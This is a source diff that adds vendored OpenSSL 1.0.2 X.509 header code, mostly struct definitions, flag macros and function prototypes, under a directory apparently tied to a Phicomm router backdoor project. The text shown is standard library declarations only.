+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/* internal only structure to hold additional X509_VERIFY_PARAM data */
+
+struct X509_VERIFY_PARAM_ID_st {
+    STACK_OF(OPENSSL_STRING) *hosts; /* Set of acceptable names */
+    unsigned int hostflags;     /* Flags to control matching features */
+    char *peername;             /* Matching hostname in peer certificate */
+    char *email;                /* If not NULL email address to match */
+    size_t emaillen;
+    unsigned char *ip;          /* If not NULL IP address to match */
+    size_t iplen;               /* Length of IP address */
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509.h
new file mode 100644
index 0000000..99337b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509.h
@@ -0,0 +1,1327 @@
+/* crypto/x509/x509.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECDH support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+
+#ifndef HEADER_X509_H
+# define HEADER_X509_H
+
+# include <openssl/e_os2.h>
+# include <openssl/symhacks.h>
+# ifndef OPENSSL_NO_BUFFER
+#  include <openssl/buffer.h>
+# endif
+# ifndef OPENSSL_NO_EVP
+#  include <openssl/evp.h>
+# endif
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/stack.h>
+# include <openssl/asn1.h>
+# include <openssl/safestack.h>
+
+# ifndef OPENSSL_NO_EC
+#  include <openssl/ec.h>
+# endif
+
+# ifndef OPENSSL_NO_ECDSA
+#  include <openssl/ecdsa.h>
+# endif
+
+# ifndef OPENSSL_NO_ECDH
+#  include <openssl/ecdh.h>
+# endif
+
+# ifndef OPENSSL_NO_DEPRECATED
+#  ifndef OPENSSL_NO_RSA
+#   include <openssl/rsa.h>
+#  endif
+#  ifndef OPENSSL_NO_DSA
+#   include <openssl/dsa.h>
+#  endif
+#  ifndef OPENSSL_NO_DH
+#   include <openssl/dh.h>
+#  endif
+# endif
+
+# ifndef OPENSSL_NO_SHA
+#  include <openssl/sha.h>
+# endif
+# include <openssl/ossl_typ.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef OPENSSL_SYS_WIN32
+/* Under Win32 these are defined in wincrypt.h */
+#  undef X509_NAME
+#  undef X509_CERT_PAIR
+#  undef X509_EXTENSIONS
+# endif
+
+# define X509_FILETYPE_PEM       1
+# define X509_FILETYPE_ASN1      2
+# define X509_FILETYPE_DEFAULT   3
+
+# define X509v3_KU_DIGITAL_SIGNATURE     0x0080
+# define X509v3_KU_NON_REPUDIATION       0x0040
+# define X509v3_KU_KEY_ENCIPHERMENT      0x0020
+# define X509v3_KU_DATA_ENCIPHERMENT     0x0010
+# define X509v3_KU_KEY_AGREEMENT         0x0008
+# define X509v3_KU_KEY_CERT_SIGN         0x0004
+# define X509v3_KU_CRL_SIGN              0x0002
+# define X509v3_KU_ENCIPHER_ONLY         0x0001
+# define X509v3_KU_DECIPHER_ONLY         0x8000
+# define X509v3_KU_UNDEF                 0xffff
+
+typedef struct X509_objects_st {
+    int nid;
+    int (*a2i) (void);
+    int (*i2a) (void);
+} X509_OBJECTS;
+
+struct X509_algor_st {
+    ASN1_OBJECT *algorithm;
+    ASN1_TYPE *parameter;
+} /* X509_ALGOR */ ;
+
+DECLARE_ASN1_SET_OF(X509_ALGOR)
+
+typedef STACK_OF(X509_ALGOR) X509_ALGORS;
+
+typedef struct X509_val_st {
+    ASN1_TIME *notBefore;
+    ASN1_TIME *notAfter;
+} X509_VAL;
+
+struct X509_pubkey_st {
+    X509_ALGOR *algor;
+    ASN1_BIT_STRING *public_key;
+    EVP_PKEY *pkey;
+};
+
+typedef struct X509_sig_st {
+    X509_ALGOR *algor;
+    ASN1_OCTET_STRING *digest;
+} X509_SIG;
+
+typedef struct X509_name_entry_st {
+    ASN1_OBJECT *object;
+    ASN1_STRING *value;
+    int set;
+    int size;                   /* temp variable */
+} X509_NAME_ENTRY;
+
+DECLARE_STACK_OF(X509_NAME_ENTRY)
+DECLARE_ASN1_SET_OF(X509_NAME_ENTRY)
+
+/* we always keep X509_NAMEs in 2 forms. */
+struct X509_name_st {
+    STACK_OF(X509_NAME_ENTRY) *entries;
+    int modified;               /* true if 'bytes' needs to be built */
+# ifndef OPENSSL_NO_BUFFER
+    BUF_MEM *bytes;
+# else
+    char *bytes;
+# endif
+/*      unsigned long hash; Keep the hash around for lookups */
+    unsigned char *canon_enc;
+    int canon_enclen;
+} /* X509_NAME */ ;
+
+DECLARE_STACK_OF(X509_NAME)
+
+# define X509_EX_V_NETSCAPE_HACK         0x8000
+# define X509_EX_V_INIT                  0x0001
+typedef struct X509_extension_st {
+    ASN1_OBJECT *object;
+    ASN1_BOOLEAN critical;
+    ASN1_OCTET_STRING *value;
+} X509_EXTENSION;
+
+typedef STACK_OF(X509_EXTENSION) X509_EXTENSIONS;
+
+DECLARE_STACK_OF(X509_EXTENSION)
+DECLARE_ASN1_SET_OF(X509_EXTENSION)
+
+/* a sequence of these are used */
+typedef struct x509_attributes_st {
+    ASN1_OBJECT *object;
+    int single;                 /* 0 for a set, 1 for a single item (which is
+                                 * wrong) */
+    union {
+        char *ptr;
+        /*
+         * 0
+         */ STACK_OF(ASN1_TYPE) *set;
+        /*
+         * 1
+         */ ASN1_TYPE *single;
+    } value;
+} X509_ATTRIBUTE;
+
+DECLARE_STACK_OF(X509_ATTRIBUTE)
+DECLARE_ASN1_SET_OF(X509_ATTRIBUTE)
+
+typedef struct X509_req_info_st {
+    ASN1_ENCODING enc;
+    ASN1_INTEGER *version;
+    X509_NAME *subject;
+    X509_PUBKEY *pubkey;
+    /*  d=2 hl=2 l=  0 cons: cont: 00 */
+    STACK_OF(X509_ATTRIBUTE) *attributes; /* [ 0 ] */
+} X509_REQ_INFO;
+
+typedef struct X509_req_st {
+    X509_REQ_INFO *req_info;
+    X509_ALGOR *sig_alg;
+    ASN1_BIT_STRING *signature;
+    int references;
+} X509_REQ;
+
+typedef struct x509_cinf_st {
+    ASN1_INTEGER *version;      /* [ 0 ] default of v1 */
+    ASN1_INTEGER *serialNumber;
+    X509_ALGOR *signature;
+    X509_NAME *issuer;
+    X509_VAL *validity;
+    X509_NAME *subject;
+    X509_PUBKEY *key;
+    ASN1_BIT_STRING *issuerUID; /* [ 1 ] optional in v2 */
+    ASN1_BIT_STRING *subjectUID; /* [ 2 ] optional in v2 */
+    STACK_OF(X509_EXTENSION) *extensions; /* [ 3 ] optional in v3 */
+    ASN1_ENCODING enc;
+} X509_CINF;
+
+/*
+ * This stuff is certificate "auxiliary info" it contains details which are
+ * useful in certificate stores and databases. When used this is tagged onto
+ * the end of the certificate itself
+ */
+
+typedef struct x509_cert_aux_st {
+    STACK_OF(ASN1_OBJECT) *trust; /* trusted uses */
+    STACK_OF(ASN1_OBJECT) *reject; /* rejected uses */
+    ASN1_UTF8STRING *alias;     /* "friendly name" */
+    ASN1_OCTET_STRING *keyid;   /* key id of private key */
+    STACK_OF(X509_ALGOR) *other; /* other unspecified info */
+} X509_CERT_AUX;
+
+struct x509_st {
+    X509_CINF *cert_info;
+    X509_ALGOR *sig_alg;
+    ASN1_BIT_STRING *signature;
+    int valid;
+    int references;
+    char *name;
+    CRYPTO_EX_DATA ex_data;
+    /* These contain copies of various extension values */
+    long ex_pathlen;
+    long ex_pcpathlen;
+    unsigned long ex_flags;
+    unsigned long ex_kusage;
+    unsigned long ex_xkusage;
+    unsigned long ex_nscert;
+    ASN1_OCTET_STRING *skid;
+    AUTHORITY_KEYID *akid;
+    X509_POLICY_CACHE *policy_cache;
+    STACK_OF(DIST_POINT) *crldp;
+    STACK_OF(GENERAL_NAME) *altname;
+    NAME_CONSTRAINTS *nc;
+# ifndef OPENSSL_NO_RFC3779
+    STACK_OF(IPAddressFamily) *rfc3779_addr;
+    struct ASIdentifiers_st *rfc3779_asid;
+# endif
+# ifndef OPENSSL_NO_SHA
+    unsigned char sha1_hash[SHA_DIGEST_LENGTH];
+# endif
+    X509_CERT_AUX *aux;
+} /* X509 */ ;
+
+DECLARE_STACK_OF(X509)
+DECLARE_ASN1_SET_OF(X509)
+
+/* This is used for a table of trust checking functions */
+
+typedef struct x509_trust_st {
+    int trust;
+    int flags;
+    int (*check_trust) (struct x509_trust_st *, X509 *, int);
+    char *name;
+    int arg1;
+    void *arg2;
+} X509_TRUST;
+
+DECLARE_STACK_OF(X509_TRUST)
+
+typedef struct x509_cert_pair_st {
+    X509 *forward;
+    X509 *reverse;
+} X509_CERT_PAIR;
+
+/* standard trust ids */
+
+# define X509_TRUST_DEFAULT      -1/* Only valid in purpose settings */
+
+# define X509_TRUST_COMPAT       1
+# define X509_TRUST_SSL_CLIENT   2
+# define X509_TRUST_SSL_SERVER   3
+# define X509_TRUST_EMAIL        4
+# define X509_TRUST_OBJECT_SIGN  5
+# define X509_TRUST_OCSP_SIGN    6
+# define X509_TRUST_OCSP_REQUEST 7
+# define X509_TRUST_TSA          8
+
+/* Keep these up to date! */
+# define X509_TRUST_MIN          1
+# define X509_TRUST_MAX          8
+
+/* trust_flags values */
+# define X509_TRUST_DYNAMIC      1
+# define X509_TRUST_DYNAMIC_NAME 2
+
+/* check_trust return codes */
+
+# define X509_TRUST_TRUSTED      1
+# define X509_TRUST_REJECTED     2
+# define X509_TRUST_UNTRUSTED    3
+
+/* Flags for X509_print_ex() */
+
+# define X509_FLAG_COMPAT                0
+# define X509_FLAG_NO_HEADER             1L
+# define X509_FLAG_NO_VERSION            (1L << 1)
+# define X509_FLAG_NO_SERIAL             (1L << 2)
+# define X509_FLAG_NO_SIGNAME            (1L << 3)
+# define X509_FLAG_NO_ISSUER             (1L << 4)
+# define X509_FLAG_NO_VALIDITY           (1L << 5)
+# define X509_FLAG_NO_SUBJECT            (1L << 6)
+# define X509_FLAG_NO_PUBKEY             (1L << 7)
+# define X509_FLAG_NO_EXTENSIONS         (1L << 8)
+# define X509_FLAG_NO_SIGDUMP            (1L << 9)
+# define X509_FLAG_NO_AUX                (1L << 10)
+# define X509_FLAG_NO_ATTRIBUTES         (1L << 11)
+# define X509_FLAG_NO_IDS                (1L << 12)
+
+/* Flags specific to X509_NAME_print_ex() */
+
+/* The field separator information */
+
+# define XN_FLAG_SEP_MASK        (0xf << 16)
+
+# define XN_FLAG_COMPAT          0/* Traditional SSLeay: use old
+                                   * X509_NAME_print */
+# define XN_FLAG_SEP_COMMA_PLUS  (1 << 16)/* RFC2253 ,+ */
+# define XN_FLAG_SEP_CPLUS_SPC   (2 << 16)/* ,+ spaced: more readable */
+# define XN_FLAG_SEP_SPLUS_SPC   (3 << 16)/* ;+ spaced */
+# define XN_FLAG_SEP_MULTILINE   (4 << 16)/* One line per field */
+
+# define XN_FLAG_DN_REV          (1 << 20)/* Reverse DN order */
+
+/* How the field name is shown */
+
+# define XN_FLAG_FN_MASK         (0x3 << 21)
+
+# define XN_FLAG_FN_SN           0/* Object short name */
+# define XN_FLAG_FN_LN           (1 << 21)/* Object long name */
+# define XN_FLAG_FN_OID          (2 << 21)/* Always use OIDs */
+# define XN_FLAG_FN_NONE         (3 << 21)/* No field names */
+
+# define XN_FLAG_SPC_EQ          (1 << 23)/* Put spaces round '=' */
+
+/*
+ * This determines if we dump fields we don't recognise: RFC2253 requires
+ * this.
+ */
+
+# define XN_FLAG_DUMP_UNKNOWN_FIELDS (1 << 24)
+
+# define XN_FLAG_FN_ALIGN        (1 << 25)/* Align field names to 20
+                                           * characters */
+
+/* Complete set of RFC2253 flags */
+
+# define XN_FLAG_RFC2253 (ASN1_STRFLGS_RFC2253 | \
+                        XN_FLAG_SEP_COMMA_PLUS | \
+                        XN_FLAG_DN_REV | \
+                        XN_FLAG_FN_SN | \
+                        XN_FLAG_DUMP_UNKNOWN_FIELDS)
+
+/* readable oneline form */
+
+# define XN_FLAG_ONELINE (ASN1_STRFLGS_RFC2253 | \
+                        ASN1_STRFLGS_ESC_QUOTE | \
+                        XN_FLAG_SEP_CPLUS_SPC | \
+                        XN_FLAG_SPC_EQ | \
+                        XN_FLAG_FN_SN)
+
+/* readable multiline form */
+
+# define XN_FLAG_MULTILINE (ASN1_STRFLGS_ESC_CTRL | \
+                        ASN1_STRFLGS_ESC_MSB | \
+                        XN_FLAG_SEP_MULTILINE | \
+                        XN_FLAG_SPC_EQ | \
+                        XN_FLAG_FN_LN | \
+                        XN_FLAG_FN_ALIGN)
+
+struct x509_revoked_st {
+    ASN1_INTEGER *serialNumber;
+    ASN1_TIME *revocationDate;
+    STACK_OF(X509_EXTENSION) /* optional */ *extensions;
+    /* Set up if indirect CRL */
+    STACK_OF(GENERAL_NAME) *issuer;
+    /* Revocation reason */
+    int reason;
+    int sequence;               /* load sequence */
+};
+
+DECLARE_STACK_OF(X509_REVOKED)
+DECLARE_ASN1_SET_OF(X509_REVOKED)
+
+typedef struct X509_crl_info_st {
+    ASN1_INTEGER *version;
+    X509_ALGOR *sig_alg;
+    X509_NAME *issuer;
+    ASN1_TIME *lastUpdate;
+    ASN1_TIME *nextUpdate;
+    STACK_OF(X509_REVOKED) *revoked;
+    STACK_OF(X509_EXTENSION) /* [0] */ *extensions;
+    ASN1_ENCODING enc;
+} X509_CRL_INFO;
+
+struct X509_crl_st {
+    /* actual signature */
+    X509_CRL_INFO *crl;
+    X509_ALGOR *sig_alg;
+    ASN1_BIT_STRING *signature;
+    int references;
+    int flags;
+    /* Copies of various extensions */
+    AUTHORITY_KEYID *akid;
+    ISSUING_DIST_POINT *idp;
+    /* Convenient breakdown of IDP */
+    int idp_flags;
+    int idp_reasons;
+    /* CRL and base CRL numbers for delta processing */
+    ASN1_INTEGER *crl_number;
+    ASN1_INTEGER *base_crl_number;
+# ifndef OPENSSL_NO_SHA
+    unsigned char sha1_hash[SHA_DIGEST_LENGTH];
+# endif
+    STACK_OF(GENERAL_NAMES) *issuers;
+    const X509_CRL_METHOD *meth;
+    void *meth_data;
+} /* X509_CRL */ ;
+
+DECLARE_STACK_OF(X509_CRL)
+DECLARE_ASN1_SET_OF(X509_CRL)
+
+typedef struct private_key_st {
+    int version;
+    /* The PKCS#8 data types */
+    X509_ALGOR *enc_algor;
+    ASN1_OCTET_STRING *enc_pkey; /* encrypted pub key */
+    /* When decrypted, the following will not be NULL */
+    EVP_PKEY *dec_pkey;
+    /* used to encrypt and decrypt */
+    int key_length;
+    char *key_data;
+    int key_free;               /* true if we should auto free key_data */
+    /* expanded version of 'enc_algor' */
+    EVP_CIPHER_INFO cipher;
+    int references;
+} X509_PKEY;
+
+# ifndef OPENSSL_NO_EVP
+typedef struct X509_info_st {
+    X509 *x509;
+    X509_CRL *crl;
+    X509_PKEY *x_pkey;
+    EVP_CIPHER_INFO enc_cipher;
+    int enc_len;
+    char *enc_data;
+    int references;
+} X509_INFO;
+
+DECLARE_STACK_OF(X509_INFO)
+# endif
+
+/*
+ * The next 2 structures and their 8 routines were sent to me by Pat Richard
+ * <patr@x509.com> and are used to manipulate Netscapes spki structures -
+ * useful if you are writing a CA web page
+ */
+typedef struct Netscape_spkac_st {
+    X509_PUBKEY *pubkey;
+    ASN1_IA5STRING *challenge;  /* challenge sent in atlas >= PR2 */
+} NETSCAPE_SPKAC;
+
+typedef struct Netscape_spki_st {
+    NETSCAPE_SPKAC *spkac;      /* signed public key and challenge */
+    X509_ALGOR *sig_algor;
+    ASN1_BIT_STRING *signature;
+} NETSCAPE_SPKI;
+
+/* Netscape certificate sequence structure */
+typedef struct Netscape_certificate_sequence {
+    ASN1_OBJECT *type;
+    STACK_OF(X509) *certs;
+} NETSCAPE_CERT_SEQUENCE;
+
+/*- Unused (and iv length is wrong)
+typedef struct CBCParameter_st
+        {
+        unsigned char iv[8];
+        } CBC_PARAM;
+*/
+
+/* Password based encryption structure */
+
+typedef struct PBEPARAM_st {
+    ASN1_OCTET_STRING *salt;
+    ASN1_INTEGER *iter;
+} PBEPARAM;
+
+/* Password based encryption V2 structures */
+
+typedef struct PBE2PARAM_st {
+    X509_ALGOR *keyfunc;
+    X509_ALGOR *encryption;
+} PBE2PARAM;
+
+typedef struct PBKDF2PARAM_st {
+/* Usually OCTET STRING but could be anything */
+    ASN1_TYPE *salt;
+    ASN1_INTEGER *iter;
+    ASN1_INTEGER *keylength;
+    X509_ALGOR *prf;
+} PBKDF2PARAM;
+
+/* PKCS#8 private key info structure */
+
+struct pkcs8_priv_key_info_st {
+    /* Flag for various broken formats */
+    int broken;
+# define PKCS8_OK                0
+# define PKCS8_NO_OCTET          1
+# define PKCS8_EMBEDDED_PARAM    2
+# define PKCS8_NS_DB             3
+# define PKCS8_NEG_PRIVKEY       4
+    ASN1_INTEGER *version;
+    X509_ALGOR *pkeyalg;
+    /* Should be OCTET STRING but some are broken */
+    ASN1_TYPE *pkey;
+    STACK_OF(X509_ATTRIBUTE) *attributes;
+};
+
+#ifdef  __cplusplus
+}
+#endif
+
+# include <openssl/x509_vfy.h>
+# include <openssl/pkcs7.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define X509_EXT_PACK_UNKNOWN   1
+# define X509_EXT_PACK_STRING    2
+
+# define         X509_get_version(x) ASN1_INTEGER_get((x)->cert_info->version)
+/* #define      X509_get_serialNumber(x) ((x)->cert_info->serialNumber) */
+# define         X509_get_notBefore(x) ((x)->cert_info->validity->notBefore)
+# define         X509_get_notAfter(x) ((x)->cert_info->validity->notAfter)
+# define         X509_extract_key(x)     X509_get_pubkey(x)/*****/
+# define         X509_REQ_get_version(x) ASN1_INTEGER_get((x)->req_info->version)
+# define         X509_REQ_get_subject_name(x) ((x)->req_info->subject)
+# define         X509_REQ_extract_key(a) X509_REQ_get_pubkey(a)
+# define         X509_name_cmp(a,b)      X509_NAME_cmp((a),(b))
+# define         X509_get_signature_type(x) EVP_PKEY_type(OBJ_obj2nid((x)->sig_alg->algorithm))
+
+# define         X509_CRL_get_version(x) ASN1_INTEGER_get((x)->crl->version)
+# define         X509_CRL_get_lastUpdate(x) ((x)->crl->lastUpdate)
+# define         X509_CRL_get_nextUpdate(x) ((x)->crl->nextUpdate)
+# define         X509_CRL_get_issuer(x) ((x)->crl->issuer)
+# define         X509_CRL_get_REVOKED(x) ((x)->crl->revoked)
+
+void X509_CRL_set_default_method(const X509_CRL_METHOD *meth);
+X509_CRL_METHOD *X509_CRL_METHOD_new(int (*crl_init) (X509_CRL *crl),
+                                     int (*crl_free) (X509_CRL *crl),
+                                     int (*crl_lookup) (X509_CRL *crl,
+                                                        X509_REVOKED **ret,
+                                                        ASN1_INTEGER *ser,
+                                                        X509_NAME *issuer),
+                                     int (*crl_verify) (X509_CRL *crl,
+                                                        EVP_PKEY *pk));
+void X509_CRL_METHOD_free(X509_CRL_METHOD *m);
+
+void X509_CRL_set_meth_data(X509_CRL *crl, void *dat);
+void *X509_CRL_get_meth_data(X509_CRL *crl);
+
+/*
+ * This one is only used so that a binary form can output, as in
+ * i2d_X509_NAME(X509_get_X509_PUBKEY(x),&buf)
+ */
+# define         X509_get_X509_PUBKEY(x) ((x)->cert_info->key)
+
+const char *X509_verify_cert_error_string(long n);
+
+# ifndef OPENSSL_NO_EVP
+int X509_verify(X509 *a, EVP_PKEY *r);
+
+int X509_REQ_verify(X509_REQ *a, EVP_PKEY *r);
+int X509_CRL_verify(X509_CRL *a, EVP_PKEY *r);
+int NETSCAPE_SPKI_verify(NETSCAPE_SPKI *a, EVP_PKEY *r);
+
+NETSCAPE_SPKI *NETSCAPE_SPKI_b64_decode(const char *str, int len);
+char *NETSCAPE_SPKI_b64_encode(NETSCAPE_SPKI *x);
+EVP_PKEY *NETSCAPE_SPKI_get_pubkey(NETSCAPE_SPKI *x);
+int NETSCAPE_SPKI_set_pubkey(NETSCAPE_SPKI *x, EVP_PKEY *pkey);
+
+int NETSCAPE_SPKI_print(BIO *out, NETSCAPE_SPKI *spki);
+
+int X509_signature_dump(BIO *bp, const ASN1_STRING *sig, int indent);
+int X509_signature_print(BIO *bp, X509_ALGOR *alg, ASN1_STRING *sig);
+
+int X509_sign(X509 *x, EVP_PKEY *pkey, const EVP_MD *md);
+int X509_sign_ctx(X509 *x, EVP_MD_CTX *ctx);
+int X509_http_nbio(OCSP_REQ_CTX *rctx, X509 **pcert);
+int X509_REQ_sign(X509_REQ *x, EVP_PKEY *pkey, const EVP_MD *md);
+int X509_REQ_sign_ctx(X509_REQ *x, EVP_MD_CTX *ctx);
+int X509_CRL_sign(X509_CRL *x, EVP_PKEY *pkey, const EVP_MD *md);
+int X509_CRL_sign_ctx(X509_CRL *x, EVP_MD_CTX *ctx);
+int X509_CRL_http_nbio(OCSP_REQ_CTX *rctx, X509_CRL **pcrl);
+int NETSCAPE_SPKI_sign(NETSCAPE_SPKI *x, EVP_PKEY *pkey, const EVP_MD *md);
+
+int X509_pubkey_digest(const X509 *data, const EVP_MD *type,
+                       unsigned char *md, unsigned int *len);
+int X509_digest(const X509 *data, const EVP_MD *type,
+                unsigned char *md, unsigned int *len);
+int X509_CRL_digest(const X509_CRL *data, const EVP_MD *type,
+                    unsigned char *md, unsigned int *len);
+int X509_REQ_digest(const X509_REQ *data, const EVP_MD *type,
+                    unsigned char *md, unsigned int *len);
+int X509_NAME_digest(const X509_NAME *data, const EVP_MD *type,
+                     unsigned char *md, unsigned int *len);
+# endif
+
+# ifndef OPENSSL_NO_FP_API
+X509 *d2i_X509_fp(FILE *fp, X509 **x509);
+int i2d_X509_fp(FILE *fp, X509 *x509);
+X509_CRL *d2i_X509_CRL_fp(FILE *fp, X509_CRL **crl);
+int i2d_X509_CRL_fp(FILE *fp, X509_CRL *crl);
+X509_REQ *d2i_X509_REQ_fp(FILE *fp, X509_REQ **req);
+int i2d_X509_REQ_fp(FILE *fp, X509_REQ *req);
+#  ifndef OPENSSL_NO_RSA
+RSA *d2i_RSAPrivateKey_fp(FILE *fp, RSA **rsa);
+int i2d_RSAPrivateKey_fp(FILE *fp, RSA *rsa);
+RSA *d2i_RSAPublicKey_fp(FILE *fp, RSA **rsa);
+int i2d_RSAPublicKey_fp(FILE *fp, RSA *rsa);
+RSA *d2i_RSA_PUBKEY_fp(FILE *fp, RSA **rsa);
+int i2d_RSA_PUBKEY_fp(FILE *fp, RSA *rsa);
+#  endif
+#  ifndef OPENSSL_NO_DSA
+DSA *d2i_DSA_PUBKEY_fp(FILE *fp, DSA **dsa);
+int i2d_DSA_PUBKEY_fp(FILE *fp, DSA *dsa);
+DSA *d2i_DSAPrivateKey_fp(FILE *fp, DSA **dsa);
+int i2d_DSAPrivateKey_fp(FILE *fp, DSA *dsa);
+#  endif
+#  ifndef OPENSSL_NO_EC
+EC_KEY *d2i_EC_PUBKEY_fp(FILE *fp, EC_KEY **eckey);
+int i2d_EC_PUBKEY_fp(FILE *fp, EC_KEY *eckey);
+EC_KEY *d2i_ECPrivateKey_fp(FILE *fp, EC_KEY **eckey);
+int i2d_ECPrivateKey_fp(FILE *fp, EC_KEY *eckey);
+#  endif
+X509_SIG *d2i_PKCS8_fp(FILE *fp, X509_SIG **p8);
+int i2d_PKCS8_fp(FILE *fp, X509_SIG *p8);
+PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_fp(FILE *fp,
+                                                PKCS8_PRIV_KEY_INFO **p8inf);
+int i2d_PKCS8_PRIV_KEY_INFO_fp(FILE *fp, PKCS8_PRIV_KEY_INFO *p8inf);
+int i2d_PKCS8PrivateKeyInfo_fp(FILE *fp, EVP_PKEY *key);
+int i2d_PrivateKey_fp(FILE *fp, EVP_PKEY *pkey);
+EVP_PKEY *d2i_PrivateKey_fp(FILE *fp, EVP_PKEY **a);
+int i2d_PUBKEY_fp(FILE *fp, EVP_PKEY *pkey);
+EVP_PKEY *d2i_PUBKEY_fp(FILE *fp, EVP_PKEY **a);
+# endif
+
+# ifndef OPENSSL_NO_BIO
+X509 *d2i_X509_bio(BIO *bp, X509 **x509);
+int i2d_X509_bio(BIO *bp, X509 *x509);
+X509_CRL *d2i_X509_CRL_bio(BIO *bp, X509_CRL **crl);
+int i2d_X509_CRL_bio(BIO *bp, X509_CRL *crl);
+X509_REQ *d2i_X509_REQ_bio(BIO *bp, X509_REQ **req);
+int i2d_X509_REQ_bio(BIO *bp, X509_REQ *req);
+#  ifndef OPENSSL_NO_RSA
+RSA *d2i_RSAPrivateKey_bio(BIO *bp, RSA **rsa);
+int i2d_RSAPrivateKey_bio(BIO *bp, RSA *rsa);
+RSA *d2i_RSAPublicKey_bio(BIO *bp, RSA **rsa);
+int i2d_RSAPublicKey_bio(BIO *bp, RSA *rsa);
+RSA *d2i_RSA_PUBKEY_bio(BIO *bp, RSA **rsa);
+int i2d_RSA_PUBKEY_bio(BIO *bp, RSA *rsa);
+#  endif
+#  ifndef OPENSSL_NO_DSA
+DSA *d2i_DSA_PUBKEY_bio(BIO *bp, DSA **dsa);
+int i2d_DSA_PUBKEY_bio(BIO *bp, DSA *dsa);
+DSA *d2i_DSAPrivateKey_bio(BIO *bp, DSA **dsa);
+int i2d_DSAPrivateKey_bio(BIO *bp, DSA *dsa);
+#  endif
+#  ifndef OPENSSL_NO_EC
+EC_KEY *d2i_EC_PUBKEY_bio(BIO *bp, EC_KEY **eckey);
+int i2d_EC_PUBKEY_bio(BIO *bp, EC_KEY *eckey);
+EC_KEY *d2i_ECPrivateKey_bio(BIO *bp, EC_KEY **eckey);
+int i2d_ECPrivateKey_bio(BIO *bp, EC_KEY *eckey);
+#  endif
+X509_SIG *d2i_PKCS8_bio(BIO *bp, X509_SIG **p8);
+int i2d_PKCS8_bio(BIO *bp, X509_SIG *p8);
+PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO_bio(BIO *bp,
+                                                 PKCS8_PRIV_KEY_INFO **p8inf);
+int i2d_PKCS8_PRIV_KEY_INFO_bio(BIO *bp, PKCS8_PRIV_KEY_INFO *p8inf);
